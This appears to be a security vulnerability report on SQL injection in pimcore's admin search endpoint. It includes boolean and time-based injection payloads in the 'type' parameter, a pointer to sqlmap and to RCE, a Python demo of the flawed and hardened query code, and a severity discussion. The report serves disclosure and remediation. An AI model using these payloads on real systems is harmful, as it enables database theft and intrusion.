SQL injection search function in pimcore/pimcore
Reported on Feb 24th 2023
Description
Link POC: https://drive.google.com/drive/folders/1oFZPVrJ7lID7tDArO8spsMy1VYr_4oOb?usp=sharing
Proof of Concept
Step 1: Log in at https://demo.pimcore.fun/admin/.
Step 2: Use the search function and intercept the request with Burp.
Step 3: Exploit. Payload to get the length of the DB version banner:
/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+length(@@version))=39+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1
Time-based check payloads:
Sleep 5 seconds:
/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(5)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1
Sleep 0 seconds:
/admin/search/search/find?_dc=1677226058611&type=document,'))+AND+(SELECT+9139+FROM+(SELECT(SLEEP(0)))iKOj)+AND+(('OShF'='OShF&query=admin&page=1&start=0&limit=1tagIds[]=1
Fuzz with sqlmap.
Impact
An attacker can dump the full DB and possibly get RCE if the WEBROOT path is known. In this case I know the WEBROOT, so I can get RCE following the article (https://viblo.asia/p/efiens-ctf-2019-write-up-tu-sql-injection-toi-rce-va-get-root-oOVlYom4K8W).
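The payloads above suggest that the comma-separated `type` parameter of the search action is spliced straight into an `IN (...)` list in the SQL text. The following is an added illustration written for this write-up, not pimcore's own code: it reproduces that flawed pattern against a constructed in-memory SQLite table, then shows the hardened form (allowlisted type names plus bound parameters) that rejects the injection. The table layout, the allowlist contents and the shape of the original query are assumptions made for the example.

```python
import sqlite3

# Assumed allowlist of element types the search action may filter on.
ALLOWED_TYPES = frozenset({"document", "asset", "object"})

# Constructed sample rows standing in for a search index table.
SAMPLE_ROWS = [
    (1, "document", "admin-guide"),
    (2, "document", "admin-faq"),
    (3, "asset", "admin-avatar.png"),
    (4, "object", "admin-user"),
]


def make_db():
    """Build an in-memory SQLite database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE search_index (id INTEGER, type TEXT, name TEXT)")
    conn.executemany("INSERT INTO search_index VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def build_vulnerable(type_param, query):
    """Mimics the flaw: the raw `type` value is joined with quotes and
    concatenated into the SQL text, so a quote in the input escapes the list."""
    type_list = "','".join(type_param.split(","))
    return (
        "SELECT id, type, name FROM search_index WHERE ((type IN ('"
        + type_list + "')) AND (name LIKE '%" + query + "%')) ORDER BY id"
    )


def search_vulnerable(conn, type_param, query):
    return conn.execute(build_vulnerable(type_param, query)).fetchall()


def parse_types(type_param):
    """Reject anything that is not a known element type before it reaches SQL."""
    types = [t.strip() for t in type_param.split(",") if t.strip()]
    bad = [t for t in types if t not in ALLOWED_TYPES]
    if bad or not types:
        raise ValueError(f"invalid type filter: {bad or type_param!r}")
    return types


def search_hardened(conn, type_param, query):
    """Allowlisted type names, one placeholder per type, and the search term
    bound as a parameter so user input is never part of the SQL text."""
    types = parse_types(type_param)
    placeholders = ",".join("?" * len(types))
    sql = (
        f"SELECT id, type, name FROM search_index WHERE type IN ({placeholders}) "
        "AND name LIKE ? ORDER BY id"
    )
    return conn.execute(sql, [*types, f"%{query}%"]).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Constructed injection in the same shape as the report's payload: it closes
    # the IN list and ORs in an always-true condition, defeating the name filter.
    injected = "document,')) OR (('1'='1"
    print(search_vulnerable(db, "document", "zzz"))   # honest input: []
    print(search_vulnerable(db, injected, "zzz"))     # injected: document rows leak
    print(search_hardened(db, "document,asset", "admin"))
    try:
        search_hardened(db, injected, "zzz")
    except ValueError as exc:
        print("rejected:", exc)
```

The allowlist is the important part for a list-valued filter: placeholders alone cannot express a variable-length `IN` list without the code generating one `?` per value, and validating the values first keeps unexpected types out regardless of which permission the calling user holds.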
Updated the severity to Medium, as you still need to be authenticated to call this action, and limited the users with permissions to the admin.
Hi, I need you to clarify where admin rights are needed to exploit. The system can decentralize users, so I think only users with search permission can exploit this vulnerability.